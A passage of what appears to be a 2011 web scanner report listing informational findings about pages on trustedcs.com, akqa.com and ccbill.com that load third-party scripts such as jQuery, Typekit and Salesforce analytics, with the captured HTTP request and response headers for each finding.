GET /SecurityBlanket/SecurityBlanket-FAQ.html HTTP/1.1
Host: trustedcs.com
Proxy-Connection: keep-alive
Referer: http://trustedcs.com/SecurityBlanket/SecurityBlanket.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.vtrenz.iMAWebCookie=14653cc8-09d7-804a-cc8b-04c4bccba599; com.vtrenz.iMA.session=01294291-8d37-4c5e-56e4-79da9e81677a

Response

17.8. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/SecurityBlanket/SecurityBlanket.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?383ED628-AF06-4463-81DC-7F3477CEDFC3
http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js

Request

GET /SecurityBlanket/SecurityBlanket.html HTTP/1.1
Host: trustedcs.com
Proxy-Connection: keep-alive
Referer: http://trustedcs.com/products/cross_domain.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.vtrenz.iMAWebCookie=14653cc8-09d7-804a-cc8b-04c4bccba599; com.vtrenz.iMA.session=01294291-8d37-4c5e-56e4-79da9e81677a

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 18:09:20 GMT
Server: Apache
Last-Modified: Tue, 05 Jul 2011 20:02:38 GMT
ETag: "3c540d-48a6-4e136dde"
Accept-Ranges: bytes
Content-Length: 18598
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?383ED628-AF06-4463-81DC-7F3477CEDFC3" type="text/javascript"></script>
<script src="http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js" type="text/javascript"></script>
...[SNIP]...

17.9. http://trustedcs.com/products/cross_domain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/products/cross_domain.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?383ED628-AF06-4463-81DC-7F3477CEDFC3
http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js

Request

GET /products/cross_domain.html HTTP/1.1
Host: trustedcs.com
Proxy-Connection: keep-alive
Referer: http://trustedcs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.vtrenz.iMAWebCookie=14653cc8-09d7-804a-cc8b-04c4bccba599; com.vtrenz.iMA.session=01294291-8d37-4c5e-56e4-79da9e81677a

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 18:09:14 GMT
Server: Apache
Last-Modified: Tue, 05 Jul 2011 20:02:38 GMT
ETag: "3bfc2d-36cd-4e136dde"
Accept-Ranges: bytes
Content-Length: 14029
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?383ED628-AF06-4463-81DC-7F3477CEDFC3" type="text/javascript"></script>
<script src="http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js" type="text/javascript"></script>
...[SNIP]...

17.10. http://www.akqa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.akqa.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
http://maps.google.com/maps/api/js?sensor=false

Request

GET / HTTP/1.1
Host: www.akqa.com
Proxy-Connection: keep-alive
Referer: http://www.akqa.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hzxworbdazhtnl55issguoqe

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 12 Jul 2011 15:32:49 GMT
Content-Length: 7145

<!DOCTYPE html>
<html class="no-js">
   <head>
       <title>AKQA: Home</title>
       <meta charset="utf-8">
<meta name="description" content="AKQA helps brands to dramatically improve their busin
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

17.11. http://www.akqa.com/approach previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.akqa.com
Path:	/approach

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
http://maps.google.com/maps/api/js?sensor=false

Request

GET /approach HTTP/1.1
Host: www.akqa.com
Proxy-Connection: keep-alive
Referer: http://www.akqa.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hzxworbdazhtnl55issguoqe; __utma=234415886.381933193.1310484778.1310484778.1310484778.1; __utmb=234415886.2.10.1310484778; __utmc=234415886; __utmz=234415886.1310484778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 12 Jul 2011 15:32:59 GMT
Content-Length: 6620

<!DOCTYPE html>
<html class="no-js">
   <head>
       <title>AKQA: Approach</title>
       <meta charset="utf-8">
<meta name="description" content="">
<meta name="keywords" content="">

...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

17.12. http://www.akqa.com/contact/san-francisco previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.akqa.com
Path:	/contact/san-francisco

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
http://maps.google.com/maps/api/js?sensor=false

Request

GET /contact/san-francisco HTTP/1.1
Host: www.akqa.com
Proxy-Connection: keep-alive
Referer: http://www.akqa.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hzxworbdazhtnl55issguoqe; __utma=234415886.381933193.1310484778.1310484778.1310484778.1; __utmb=234415886.7.10.1310484778; __utmc=234415886; __utmz=234415886.1310484778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 12 Jul 2011 15:33:17 GMT
Content-Length: 6873

<!DOCTYPE html>
<html class="no-js">
   <head>
       <title>AKQA: Contact - San Francisco</title>
       <meta charset="utf-8">
<meta name="description" content="118 King Street, San Francisco, CA
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

17.13. http://www.akqa.com/library/js/akqa.devicemanager.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.akqa.com
Path:	/library/js/akqa.devicemanager.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://use.typekit.com/kca3bgf.js
http://use.typekit.com/qzd6cip.js
http://use.typekit.com/zro2jlc.js

Request

GET /library/js/akqa.devicemanager.js HTTP/1.1
Host: www.akqa.com
Proxy-Connection: keep-alive
Referer: http://www.akqa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hzxworbdazhtnl55issguoqe

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 16 Jun 2011 09:42:05 GMT
Accept-Ranges: bytes
ETag: "8054b3a692ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 12 Jul 2011 15:32:44 GMT
Content-Length: 5251

...//wrap code in a closure to allow use of $
(function ($) {

AKQA.DeviceManager = (function () {
// Device detection
var isiPad = (navigator.platform.match(/iPad/i)) ? true
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://fast.fonts.com/cssapi/a35df4d4-8139-4cbd-b0d2-8f3803a0d16e.css">' +
'<script type="text/javascript" src="http://use.typekit.com/zro2jlc.js"></script>' //regular
//'<script type="text/javascript" src="http://use.typekit.com/qzd6cip.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://fast.fonts.com/cssapi/a35df4d4-8139-4cbd-b0d2-8f3803a0d16e.css">' +
'<script type="text/javascript" src="http://use.typekit.com/kca3bgf.js"></script>
...[SNIP]...

17.14. http://www.akqa.com/work/volkswagen/real-racing-gti previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.akqa.com
Path:	/work/volkswagen/real-racing-gti

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
http://maps.google.com/maps/api/js?sensor=false

Request

GET /work/volkswagen/real-racing-gti HTTP/1.1
Host: www.akqa.com
Proxy-Connection: keep-alive
Referer: http://www.akqa.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hzxworbdazhtnl55issguoqe; __utma=234415886.381933193.1310484778.1310484778.1310484778.1; __utmb=234415886.1.10.1310484778; __utmc=234415886; __utmz=234415886.1310484778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 12 Jul 2011 15:32:55 GMT
Content-Length: 8300

<!DOCTYPE html>
<html class="no-js">
   <head>
       <title>Volkswagen Real Racing GTI</title>
       <meta charset="utf-8">
<meta name="description" content="">
<meta name="keywords" con
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

17.15. http://www.akqa.com/work/warner-brothers/221b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.akqa.com
Path:	/work/warner-brothers/221b

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
http://maps.google.com/maps/api/js?sensor=false

Request

GET /work/warner-brothers/221b HTTP/1.1
Host: www.akqa.com
Proxy-Connection: keep-alive
Referer: http://www.akqa.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hzxworbdazhtnl55issguoqe; __utma=234415886.381933193.1310484778.1310484778.1310484778.1; __utmb=234415886.4.10.1310484778; __utmc=234415886; __utmz=234415886.1310484778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 12 Jul 2011 15:33:12 GMT
Content-Length: 7915

<!DOCTYPE html>
<html class="no-js">
   <head>
       <title>221B</title>
       <meta charset="utf-8">
<meta name="description" content="">
<meta name="keywords" content="">

       <meta na
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

17.16. http://www.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ccbill.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://lct.salesforce.com/sfga.js

Request

GET / HTTP/1.1
Host: www.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:00:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html; charset=UTF-8
Content-Length: 9994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online Merchant Ser
...[SNIP]...


<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

17.17. http://www.ccbill.com/developers/faq.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ccbill.com
Path:	/developers/faq.php

Issue detail

The response dynamically includes the following script from another domain:

https://lct.salesforce.com/sfga.js

Request

GET /developers/faq.php HTTP/1.1
Host: www.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ccbill.com/developers/index.php
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.2.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:01:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html; charset=UTF-8
Content-Length: 8964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Payment Processing
...[SNIP]...


<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

17.18. http://www.ccbill.com/developers/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ccbill.com
Path:	/developers/index.php

Issue detail

The response dynamically includes the following script from another domain:

https://lct.salesforce.com/sfga.js

Request

GET /developers/index.php HTTP/1.1
Host: www.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.1.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:01:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html; charset=UTF-8
Content-Length: 12236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online Payment Pro
...[SNIP]...


<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

17.19. http://www.ccbill.com/developers/security/security-rewards-program.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ccbill.com
Path:	/developers/security/security-rewards-program.php

Issue detail

The response dynamically includes the following scripts from other domains:

https://lct.salesforce.com/sfga.js
https://www.google.com/recaptcha/api/challenge?k=6Len8wgAAAAAACf6Nd2UgmqoiHuP74_BI2bzUgWI

Request

GET /developers/security/security-rewards-program.php HTTP/1.1
Host: www.ccbill.com
Proxy-Connection: keep-alive
Referer: http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.1.10.1310490247; __utmc=250776793; __utmz=250776793.1310490247.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html; charset=UTF-8
Content-Length: 11730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Security Rewards P
...[SNIP]...
<center>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6Len8wgAAAAAACf6Nd2UgmqoiHuP74_BI2bzUgWI"></script>
...[SNIP]...


<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

17.20. http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ccbill.com
Path:	/developers/security/vulnerability-reward-program-participation.php

Issue detail

The response dynamically includes the following script from another domain:

https://lct.salesforce.com/sfga.js

Request

GET /developers/security/vulnerability-reward-program-participation.php HTTP/1.1
Host: www.ccbill.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ccbill+vulnerability+rewards
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utmz=250776793.1306890612.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; __utma=250776793.28934213.1306890612.1306890612.1306890612.1

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html; charset=UTF-8
Content-Length: 10116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online Merchant Se
...[SNIP]...


<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

17.21. https://www.ccbill.com/developers/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ccbill.com
Path:	/developers/index.php

Issue detail

The response dynamically includes the following script from another domain:

https://lct.salesforce.com/sfga.js

Request

GET /developers/index.php HTTP/1.1
Host: www.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.3.10.1310490247; __utmc=250776793; __utmz=250776793.1310490278.2.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:07:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 12236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online Payment Pro
...[SNIP]...


<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

17.22. https://www.ccbill.com/developers/security/vulnerability-reward-registration.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ccbill.com
Path:	/developers/security/vulnerability-reward-registration.php

Issue detail

The response dynamically includes the following scripts from other domains:

https://lct.salesforce.com/sfga.js
https://www.google.com/recaptcha/api/challenge?k=6Len8wgAAAAAACf6Nd2UgmqoiHuP74_BI2bzUgWI

Request

GET /developers/security/vulnerability-reward-registration.php HTTP/1.1
Host: www.ccbill.com
Connection: keep-alive
Referer: http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.3.10.1310490247; __utmc=250776793; __utmz=250776793.1310490278.2.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:07:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 26024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
